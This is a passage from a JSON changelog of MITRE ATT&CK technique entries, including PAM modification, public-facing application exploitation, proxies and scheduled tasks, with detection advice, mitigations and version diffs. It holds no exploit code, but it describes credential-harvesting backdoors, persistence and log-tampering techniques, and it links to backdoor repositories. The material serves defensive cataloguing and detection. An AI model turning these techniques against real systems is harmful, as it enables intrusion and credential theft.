"description": "Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices"
},
{
"source_name": "EK Impeding Malware Analysis",
"description": "Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019.",
"url": "https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf"
},
{
"source_name": "Environmental Keyed HTA",
"description": "Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019.",
"url": "https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/"
},
{
"source_name": "Ebowla: Genetic Malware",
"description": "Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing Payloads for Specific Targets. Retrieved January 18, 2019.",
"url": "https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf"
},
{
"source_name": "Demiguise Guardrail Router Logo",
"description": "Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019.",
"url": "https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Nick Carr, Mandiant"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution"
],
"x_mitre_defense_bypassed": [
"Anti-virus",
"Host forensic analysis",
"Signature-based detection",
"Static file analysis"
],
"x_mitre_detection": "Detecting the use of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_version": "1.0",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-06-09 18:53:58.159000+00:00\", \"old_value\": \"2021-03-29 19:56:42.242000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Nick Carr, Mandiant\", \"old_value\": \"Nick Carr, FireEye\"}}}",
"previous_version": "1.0",
"changelog_mitigations": {
"shared": [
"M1055: Do Not Mitigate"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0017: Command (Command Execution)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2018-04-18 17:59:24.739000+00:00",
"modified": "2021-07-20 21:51:45.776000+00:00",
"name": "Exploit Public-Facing Application",
"description": "Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). \n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1190",
"external_id": "T1190"
},
{
"source_name": "NVD CVE-2016-6662",
"description": "National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018.",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6662"
},
{
"source_name": "CIS Multiple SMB Vulnerabilities",
"description": "CIS. (2017, May 15). Multiple Vulnerabilities in Microsoft Windows SMB Server Could Allow for Remote Code Execution. Retrieved April 3, 2018.",
"url": "https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/"
},
{
"source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018",
"description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.",
"url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A"
},
{
"source_name": "Cisco Blog Legacy Device Attacks",
"description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.",
"url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
},
{
"source_name": "NVD CVE-2014-7169",
"description": "National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018.",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2014-7169"
},
{
"source_name": "OWASP Top 10",
"description": "OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.",
"url": "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project"
},
{
"source_name": "CWE top 25",
"description": "Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011, September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved April 10, 2019.",
"url": "https://cwe.mitre.org/top25/index.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Yossi Weizman, Azure Defender Research Team",
"Praetorian"
],
"x_mitre_data_sources": [
"Application Log: Application Log Content",
"Network Traffic: Network Traffic Content"
],
"x_mitre_detection": "Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
"x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Windows",
"IaaS",
"Network",
"Linux",
"macOS",
"Containers"
],
"x_mitre_version": "2.3",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-07-20 21:51:45.776000+00:00\", \"old_value\": \"2021-04-12 18:25:16.409000+00:00\"}}}",
"previous_version": "2.3",
"changelog_mitigations": {
"shared": [
"M1016: Vulnerability Scanning",
"M1026: Privileged Account Management",
"M1030: Network Segmentation",
"M1048: Application Isolation and Sandboxing",
"M1050: Exploit Protection",
"M1051: Update Software",
"T1190: Exploit Public-Facing Application Mitigation"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0015: Application Log (Application Log Content)",
"DS0029: Network Traffic (Network Traffic Content)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2017-05-31 21:31:04.710000+00:00",
"modified": "2021-08-23 20:44:32.048000+00:00",
"name": "File and Directory Discovery",
"description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1083",
"external_id": "T1083"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/127.html",
"external_id": "CAPEC-127"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/497.html",
"external_id": "CAPEC-497"
},
{
"source_name": "Windows Commands JPCERT",
"description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.",
"url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution",
"Process: OS API Execution"
],
"x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User",
"Administrator",
"SYSTEM"
],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_system_requirements": [
"Some folders may require Administrator, SYSTEM or specific user depending on permission levels and access controls"
],
"x_mitre_version": "1.3",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-23 20:44:32.048000+00:00\", \"old_value\": \"2020-09-16 16:02:16.770000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\\n\\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).\", \"old_value\": \"Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\\n\\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\\n \\n-Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).\\n+Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).\"}, \"root['external_references'][3]['url']\": {\"new_value\": \"https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html\", \"old_value\": \"http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html\"}}}",
"previous_version": "1.3",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may enumerate files and directories or may searc | t | 1 | Adversaries may enumerate files and directories or may searc |
| > | h in specific locations of a host or network share for certa | > | h in specific locations of a host or network share for certa | ||
| > | in information within a file system. Adversaries may use the | > | in information within a file system. Adversaries may use the | ||
| > | information from [File and Directory Discovery](https://att | > | information from [File and Directory Discovery](https://att | ||
| > | ack.mitre.org/techniques/T1083) during automated discovery t | > | ack.mitre.org/techniques/T1083) during automated discovery t | ||
| > | o shape follow-on behaviors, including whether or not the ad | > | o shape follow-on behaviors, including whether or not the ad | ||
| > | versary fully infects the target and/or attempts specific ac | > | versary fully infects the target and/or attempts specific ac | ||
| > | tions. Many command shell utilities can be used to obtain t | > | tions. Many command shell utilities can be used to obtain t | ||
| > | his information. Examples include <code>dir</code>, <code>tr | > | his information. Examples include <code>dir</code>, <code>tr | ||
| > | ee</code>, <code>ls</code>, <code>find</code>, and <code>loc | > | ee</code>, <code>ls</code>, <code>find</code>, and <code>loc | ||
| > | ate</code>. (Citation: Windows Commands JPCERT) Custom tools | > | ate</code>.(Citation: Windows Commands JPCERT) Custom tools | ||
| > | may also be used to gather file and directory information a | > | may also be used to gather file and directory information an | ||
| > | nd interact with the [Native API](https://attack.mitre.org/t | > | d interact with the [Native API](https://attack.mitre.org/te | ||
| > | echniques/T1106). | > | chniques/T1106). |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may leverage the COR_PROFILER environment variab | t | 1 | Adversaries may leverage the COR_PROFILER environment variab |
| > | le to hijack the execution flow of programs that load the .N | > | le to hijack the execution flow of programs that load the .N | ||
| > | ET CLR. The COR_PROFILER is a .NET Framework feature which a | > | ET CLR. The COR_PROFILER is a .NET Framework feature which a | ||
| > | llows developers to specify an unmanaged (or external of .NE | > | llows developers to specify an unmanaged (or external of .NE | ||
| > | T) profiling DLL to be loaded into each .NET process that lo | > | T) profiling DLL to be loaded into each .NET process that lo | ||
| > | ads the Common Language Runtime (CLR). These profiliers are | > | ads the Common Language Runtime (CLR). These profilers are d | ||
| > | designed to monitor, troubleshoot, and debug managed code ex | > | esigned to monitor, troubleshoot, and debug managed code exe | ||
| > | ecuted by the .NET CLR.(Citation: Microsoft Profiling Mar 20 | > | cuted by the .NET CLR.(Citation: Microsoft Profiling Mar 201 | ||
| > | 17)(Citation: Microsoft COR_PROFILER Feb 2013) The COR_PROF | > | 7)(Citation: Microsoft COR_PROFILER Feb 2013) The COR_PROFI | ||
| > | ILER environment variable can be set at various scopes (syst | > | LER environment variable can be set at various scopes (syste | ||
| > | em, user, or process) resulting in different levels of influ | > | m, user, or process) resulting in different levels of influe | ||
| > | ence. System and user-wide environment variable scopes are s | > | nce. System and user-wide environment variable scopes are sp | ||
| > | pecified in the Registry, where a [Component Object Model](h | > | ecified in the Registry, where a [Component Object Model](ht | ||
| > | ttps://attack.mitre.org/techniques/T1559/001) (COM) object c | > | tps://attack.mitre.org/techniques/T1559/001) (COM) object ca | ||
| > | an be registered as a profiler DLL. A process scope COR_PROF | > | n be registered as a profiler DLL. A process scope COR_PROFI | ||
| > | ILER can also be created in-memory without modifying the Reg | > | LER can also be created in-memory without modifying the Regi | ||
| > | istry. Starting with .NET Framework 4, the profiling DLL doe | > | stry. Starting with .NET Framework 4, the profiling DLL does | ||
| > | s not need to be registered as long as the location of the D | > | not need to be registered as long as the location of the DL | ||
| > | LL is specified in the COR_PROFILER_PATH environment variabl | > | L is specified in the COR_PROFILER_PATH environment variable | ||
| > | e.(Citation: Microsoft COR_PROFILER Feb 2013) Adversaries m | > | .(Citation: Microsoft COR_PROFILER Feb 2013) Adversaries ma | ||
| > | ay abuse COR_PROFILER to establish persistence that executes | > | y abuse COR_PROFILER to establish persistence that executes | ||
| > | a malicious DLL in the context of all .NET processes every | > | a malicious DLL in the context of all .NET processes every t | ||
| > | time the CLR is invoked. The COR_PROFILER can also be used t | > | ime the CLR is invoked. The COR_PROFILER can also be used to | ||
| > | o elevate privileges (ex: [Bypass User Account Control](http | > | elevate privileges (ex: [Bypass User Account Control](https | ||
| > | s://attack.mitre.org/techniques/T1548/002)) if the victim .N | > | ://attack.mitre.org/techniques/T1548/002)) if the victim .NE | ||
| > | ET process executes at a higher permission level, as well as | > | T process executes at a higher permission level, as well as | ||
| > | to hook and [Impair Defenses](https://attack.mitre.org/tech | > | to hook and [Impair Defenses](https://attack.mitre.org/techn | ||
| > | niques/T1562) provided by .NET processes.(Citation: RedCanar | > | iques/T1562) provided by .NET processes.(Citation: RedCanary | ||
| > | y Mockingbird May 2020)(Citation: Red Canary COR_PROFILER Ma | > | Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May | ||
| > | y 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: Gi | > | 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: Git | ||
| > | tHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers Ma | > | Hub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May | ||
| > | y 2017) | > | 2017) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may delete or alter generated artifacts on a hos | t | 1 | Adversaries may delete or alter generated artifacts on a hos |
| > | t system, including logs or captured files such as quarantin | > | t system, including logs or captured files such as quarantin | ||
| > | ed malware. Locations and format of logs are platform or pro | > | ed malware. Locations and format of logs are platform or pro | ||
| > | duct-specific, however standard operating system logs are ca | > | duct-specific, however standard operating system logs are ca | ||
| > | ptured as Windows events or Linux/macOS files such as [Bash | > | ptured as Windows events or Linux/macOS files such as [Bash | ||
| > | History](https://attack.mitre.org/techniques/T1552/003) and | > | History](https://attack.mitre.org/techniques/T1552/003) and | ||
| > | /var/log/*. These actions may interfere with event collecti | > | /var/log/*. These actions may interfere with event collecti | ||
| > | on, reporting, or other notifications used to detect intrusi | > | on, reporting, or other notifications used to detect intrusi | ||
| > | on activity. This that may compromise the integrity of secur | > | on activity. This may compromise the integrity of security s | ||
| > | ity solutions by causing notable events to go unreported. Th | > | olutions by causing notable events to go unreported. This ac | ||
| > | is activity may also impede forensic analysis and incident r | > | tivity may also impede forensic analysis and incident respon | ||
| > | esponse, due to lack of sufficient data to determine what oc | > | se, due to lack of sufficient data to determine what occurre | ||
| > | curred. | > | d. |
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference. \n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)\n\nMonitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nMonitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins)\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
"x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Windows",
"Linux",
"macOS",
"Network"
],
"x_mitre_version": "2.0",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-17 14:48:33.990000+00:00\", \"old_value\": \"2021-04-26 20:08:31.712000+00:00\"}}}",
"previous_version": "2.0",
"changelog_mitigations": {
"shared": [
"M1022: Restrict File and Directory Permissions",
"M1025: Privileged Process Integrity",
"M1026: Privileged Account Management",
"M1028: Operating System Configuration",
"M1032: Multi-factor Authentication"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (OS API Execution)",
"DS0009: Process (Process Access)",
"DS0011: Module (Module Load)",
"DS0022: File (File Creation)",
"DS0022: File (File Modification)",
"DS0024: Windows Registry (Windows Registry Key Modification)",
"DS0028: Logon Session (Logon Session Creation)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-06-26 04:01:09.648000+00:00",
"modified": "2021-10-17 14:48:33.580000+00:00",
"name": "Pluggable Authentication Modules",
"description": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)\n\nAdversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)\n\nMalicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "credential-access"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1556/003",
"external_id": "T1556.003"
},
{
"source_name": "Apple PAM",
"description": "Apple. (2011, May 11). PAM - Pluggable Authentication Modules. Retrieved June 25, 2020.",
"url": "https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt"
},
{
"source_name": "Man Pam_Unix",
"description": "die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June 25, 2020.",
"url": "https://linux.die.net/man/8/pam_unix"
},
{
"source_name": "Red Hat PAM",
"description": "Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES (PAM). Retrieved June 25, 2020.",
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules"
},
{
"source_name": "PAM Backdoor",
"description": "zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June 25, 2020.",
"url": "https://github.com/zephrax/linux-pam-backdoor"
},
{
"source_name": "PAM Creds",
"description": "Fern\u00e1ndez, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors & DNS requests. Retrieved June 26, 2020.",
"url": "https://x-c3ll.github.io/posts/PAM-backdoor-DNS/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Scott Knight, @sdotknight, VMware Carbon Black",
"George Allen, VMware Carbon Black"
],
"x_mitre_data_sources": [
"File: File Modification",
"Logon Session: Logon Session Creation"
],
"x_mitre_detection": "Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nLook for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"root"
],
"x_mitre_platforms": [
"Linux",
"macOS"
],
"x_mitre_version": "2.0",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-17 14:48:33.580000+00:00\", \"old_value\": \"2021-04-20 20:12:34.422000+00:00\"}}}",
"previous_version": "2.0",
"changelog_mitigations": {
"shared": [
"M1026: Privileged Account Management",
"M1032: Multi-factor Authentication"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0022: File (File Modification)",
"DS0028: Logon Session (Logon Session Creation)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2017-05-31 21:31:08.479000+00:00",
"modified": "2021-08-30 19:16:11.648000+00:00",
"name": "Proxy",
"description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1090",
"external_id": "T1090"
},
{
"source_name": "Trend Micro APT Attack Tools",
"description": "Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.",
"url": "http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/"
},
{
"source_name": "University of Birmingham C2",
"description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
"url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Jon Sheedy",
"Heather Linn",
"Walker Johnson"
],
"x_mitre_data_sources": [
"Network Traffic: Network Traffic Flow",
"Network Traffic: Network Connection Creation",
"Network Traffic: Network Traffic Content"
],
"x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nConsider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).",
"x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows",
"Network"
],
"x_mitre_version": "3.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-30 19:16:11.648000+00:00\", \"old_value\": \"2020-10-21 17:54:28.531000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Jon Sheedy\", \"old_value\": \"Brian Prange\"}}}",
"previous_version": "3.1",
"changelog_mitigations": {
"shared": [
"M1020: SSL/TLS Inspection",
"M1031: Network Intrusion Prevention",
"M1037: Filter Network Traffic"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0029: Network Traffic (Network Connection Creation)",
"DS0029: Network Traffic (Network Traffic Content)",
"DS0029: Network Traffic (Network Traffic Flow)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2017-05-31 21:30:46.977000+00:00",
"modified": "2021-10-15 14:36:26.445000+00:00",
"name": "Scheduled Task/Job",
"description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\n\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1053",
"external_id": "T1053"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/557.html",
"external_id": "CAPEC-557"
},
{
"source_name": "TechNet Task Scheduler Security",
"description": "Microsoft. (2005, January 21). Task Scheduler and security. Retrieved June 8, 2016.",
"url": "https://technet.microsoft.com/en-us/library/cc785125.aspx"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Prashant Verma, Paladion",
"Leo Loobeek, @leoloobeek",
"Travis Smith, Tripwire",
"Alain Homewood, Insomnia Security"
],
"x_mitre_data_sources": [
"File: File Creation",
"Container: Container Creation",
"Scheduled Job: Scheduled Job Creation",
"Command: Command Execution",
"File: File Modification",
"Process: Process Creation"
],
